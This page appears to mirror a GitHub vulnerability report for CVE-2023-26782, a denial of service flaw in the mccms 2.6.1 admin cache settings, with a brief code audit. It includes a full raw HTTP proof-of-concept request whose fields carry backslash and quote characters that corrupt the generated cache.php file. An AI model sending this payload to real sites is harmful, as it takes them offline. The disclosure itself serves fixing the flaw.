Headline

CVE-2023-26782: There is a denial of service vulnerability in your project · Issue #2 · chshcms/mccms

An issue discovered in mccms 2.6.1 allows remote attackers to cause a denial of service via Backend management interface ->System Configuration->Cache Configuration->Cache security characters.

1 year ago

CVE

Open in Source

#vulnerability #web #mac #dos #redis #js #java #intel #php #perl #firefox

Hello, we found that your project has a denial of service vulnerability. Details are as follows.

Vulnerability Function Point
The function point exists in Backend management interface ->System Configuration->Cache Configuration->Cache security characters
Vulnerability details
Httpraw packet

POST /admin.php/setting/cache_save HTTP/1.1
Host: 172.20.10.3:81
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 297
Origin: http://172.20.10.3:81
Connection: close
Referer: http://172.20.10.3:81/admin.php/setting/cache
Cookie: mc_admin_id=972crMx4oruLsvSMuCQXg89E59IOc1gCMu4UbgT2; mc_admin_nichen=60e3ZaYNY8XyAN56ivxQjLyJIwtpFNMFPD2rXUJoIUJazlazXN4; mc_admin_login=89f0uw62E0x-cUBqH1lgtD4EbEsdytBZGLWhBDRRiwv2iT0vaJpingm4ylkt8PD4ndhPfLzwoCgMerpjnw

Cache_Mode=0&Cache_Rand=ygmjqw7jpia4aughbhj%5C&Cache_Mem_Ip=127.0.0.1a%2F%2F%2F%E9%8E%88'%22%5C(&Cache_Mem_Port=11211&Cache_Mem_Pass=()&Cache_Redis_Ip=127.0.0.1&Cache_Redis_Port=6379&Cache_Redis_Pass=()&Cache_Time_Index=1800&Cache_Time_List=3600&Cache_Time_Show=1&Cache_Time_Pic=3600&Cache_Time=72

When I add the “\” character after the Cache_Rand parameter, it can cause the site to not work properly.As you can see in the screenshot below, when you visit the website now, the response status code is already 500 and the website is no longer working properly.

Code audit
According to the function route, we can locate the “sys/apps/controllers/admin/Setting.php” file,Based on the function route, we can locate the cache_save function in the sys/apps/controllers/admin/Setting.php file.The Cache_Rand parameter passed in by the user is written to the cache.php file.

Then we open the “sys/libs/cache.php” file.You can see that the “\” symbol is used as an escape character to escape the “’”symbol.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago